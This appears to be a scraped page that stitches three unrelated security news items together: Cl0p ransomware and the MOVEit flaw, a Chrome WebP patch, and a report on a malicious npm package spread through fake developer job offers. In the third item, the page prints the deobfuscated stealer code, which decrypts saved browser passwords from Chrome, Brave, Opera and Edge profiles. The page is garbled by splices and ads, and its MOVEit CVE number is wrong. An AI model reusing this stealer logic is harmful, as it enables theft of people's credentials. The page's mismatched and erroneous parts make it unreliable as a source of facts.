U.S. Govt offers $10 Million Bounty on Info About Cl0p Ransomware Gang
In recent times, there have been several reports about the CL0Pransomware gang exploiting the MOVEit transfer application.
The CISA and the FBI have published a Cybersecurity Advisory, which consists of the CL0P ransomware gang’s TTPs (Tactics, Techniques, and Procedures), IoCs (Indicators of Compromises), and mitigations.
Based on the known information, the CL0P ransomware group has been targeting and exploiting an SQL injection vulnerability in the MOVEit File Transfer application (CVE-2023-3436).
Most of these exploitations were internet-facing based MOVEit managed File Transfer (MFT) solution.
CL0P acted as a Ransomware-as-a-Service (RaaS) and an affiliate for other RaaS-based groups.
This threat actor acted as an Initial Access Broker (IAB) for other threat actors to enter the organization. This is typically done through a phishing campaign.
Between 2020 to 2021, they exploited many zero-day targeting Accellion FTA servers and installed a web shell named DEWMODE.
At the start of this year, the TA was exploiting a zero-day vulnerability in theGoAnyWhere MFT platform that affected 130 victims in 10 days which was a great impact in a short period.
A complete list of exploitation and methodologies were published by the CISA and the FBI collaboratively, including TTPs, impact, IoCs, and other important information.
Mitigations
Review and Monitor all Remote access execution logs.
Google has upgraded the Stable and Extended stable channels to 116.0.5845.187 for Mac and Linux and 116.0.5845.187/.188 for Windows as part of a security update for Chrome.
This release comes with one “Critical” security patch. The upgrade will roll out over the following days and weeks.
Critical Vulnerability Addressed
Heap buffer overflow in WebP is a critical vulnerability tracked as (CVE-2023-4863).
“Google is aware that an exploit for CVE-2023-4863 exists in the wild”, Google said in its security advisory.
The Citizen Lab at The University of Toronto’s Munk School and Apple Security Engineering and Architecture (SEAR) reported this on September 6th.
The firm is still withholding more information about the attacks.
“Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” Google explains.
In order to ensure the safety and security of our projects, we may need to maintain limitations if a bug is discovered in a third-party library that is also utilized by other projects. If this issue has not yet been resolved, it is critical that we continue to impose restrictions to prevent any potential harm or damage that may result from exploiting the vulnerability, Google said.
Protect your Business Email from threats like tracking, blocking, modifying, phishing, account takeover, business email compromise, malware, and ransomware with Trustifi’s AI-powered email security solution.
Chrome Security Update
“The Stable and Extended stable channels have been updated to 116.0.5845.187 for Mac and Linux and 116.0.5845.187/.188 for Windows, which will roll out over the coming days/weeks”, Google said.
Chrome for Linux and MacOS: 116.0.5845.187
Chrome for Windows: 116.0.5845.187/.188
How to Update Google Chrome
On your computer, open Chrome.
At the top right, click More.
Click Help About Google Chrome.
Click Update Google Chrome. Important: If you can’t find this button, you’re on the latest version.
Click Relaunch.
The update should be installed soon to protect the system and browser against issues.
Windows Malware Dropped From Fake Software Developers Job Offers Scheme
[[{“value”:”
February 24, 2024 – Phylum, a leader in cybersecurity research, has unveiled a sophisticated malware campaign aimed at software developers seeking employment.
This alarming scheme, identified in collaboration with Palo Alto Network’s Unit 42, involves fake developer job offers that serve as a conduit for delivering malware onto unsuspecting victims’ Windows systems.
You can analyze such malware files, networks, modules, and registry activity with theANY.RUN malware sandbox, and theThreat Intelligence Lookup which will let you interact with the OS directly from the browser.
Fake jobs description for developer role
The campaign, linked to North Korean actors, leverages obfuscated JavaScript and has been tied to the notorious BeaverTail malware. This revelation is part of Phylum’s ongoing efforts to safeguard the open-source ecosystem from malicious actors.
The company’s latest findings spotlight an npm package, masquerading as a code profiler that installs malicious scripts designed to steal cryptocurrency and credentials.
According to the Phylum report shared with Cyber Security News, The attackers ingeniously hid their malware within a test file, exploiting the common oversight of developers to scrutinize such code for threats. This tactic, however, contained critical flaws that enabled Phylum’s researchers to connect the malicious package to suspect GitHub repositories, furthering their investigation into these nefarious activities.
On February 5, 2024, an npm user under the alias “nino1234” published a version of the execution-time-async package, closely mimicking the legitimate execution-time utility, which boasts over 27,000 downloads.
More than 300,000 analysts use ANY.RUN is a malware analysis sandbox worldwide. Join the community to conduct in-depth investigations into the top threats and collect detailed reports on their behavior..
This counterfeit package, upon deobfuscation, revealed its true intent: to pilfer login credentials and passwords from various browsers. Following the initial theft, a Python script is downloaded and executed, triggering additional downloads and compromising further personal data.
Stealer supports multiiple browsers
const K = “/AppData/Local/Microsoft/Edge/User Data”,
P = (t, c) => {
result = “”;
try {
const r = `${t}`,
e = require(`${homedir}/store.node`);
if (osType != “Windows_NT”) return;
const E = “SELECT * FROM logins”,
s = `${H(“~/”)}${c}`;
let F = path.join(s, “Local State”);
fs.readFile(F, “utf-8”, (t, c) => {
if (!t) {
(mkey = JSON.parse(c)),
(mkey = mkey.os_crypt.encrypted_key),
(mkey = ((t) => {
var c = atob(t),
r = new Uint8Array(c.length);
for (let t = 0; t < c.length; t++) r[t] = c.charCodeAt(t);
return r;
})(mkey));
try {
const t = e.CryptUnprotectData(mkey.slice(5));
for (ii = 0; ii <= 200; ii++) {
const c = 0 === ii ? “Default” : `Profile ${ii}`,
e = `${s}/${c}/Login Data`,
o = `${s}/t${c}`;
if (!j(e)) continue;
const F = `${r}_${ii}_Profile`;
fs.copyFile(e, o, (c) => {
try {
const c = new sqlite3.Database(o);
c.all(E, (r, e) => {
var E = “”;
r ||
e.forEach((c) => {
var r = c.origin_url,
e = c.username_value,
o = c.password_value;
try {
“v” === o.subarray(0, 1).toString() &&
((iv = o.subarray(3, 15)),
(cip = o.subarray(15, o.length – 16)),
cip.length &&
((mmm = crypto.createDecipheriv(“aes-256-gcm”, t, iv).update(cip)),
(E = `${E}W:${r} U: ${e} P:${mmm.toString(
“latin1”
)}nn`)));
} catch (t) {}
}),
c.close(),
fs.unlink(o, (t) => {}),
Ut(F, E);
});
} catch (t) {}
});
}
} catch (t) {}
}
});
} catch (t) {}
},
ot = [
[
“/Library/Application Support/Google/Chrome”,
“/.config/google-chrome”,
“/AppData/Local/Google/Chrome/User Data”,
],
[
“/Library/Application Support/BraveSoftware/Brave-Browser”,
“/.config/BraveSoftware/Brave-Browser”,
“/AppData/Local/BraveSoftware/Brave-Browser/User Data”,
],
[
“/Library/Application Support/com.operasoftware.Opera”,
“/.config/opera”,
“/AppData/Roaming/Opera Software/Opera Stable/User Data”
],
],
st = “Local Extension Settings”, //Local Extension Settings
Bt = “solana_id.txt”;
Phylum’s discovery has not only shed light on this deceptive operation but has also prompted gratitude from the developer community. Several software developers, having narrowly avoided falling prey to this scheme, thanked Phylum for its pivotal role in raising awareness about this targeted attack.
As the investigation continues, Phylum remains committed to identifying and neutralizing threats within the open-source domain. The company urges developers and organizations alike to remain vigilant, especially when engaging with unsolicited job offers or integrating third-party packages into their projects.
For more technical analysis information on protecting your systems and data from similar threats, visit Phylum’s website or contact their cybersecurity experts directly.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.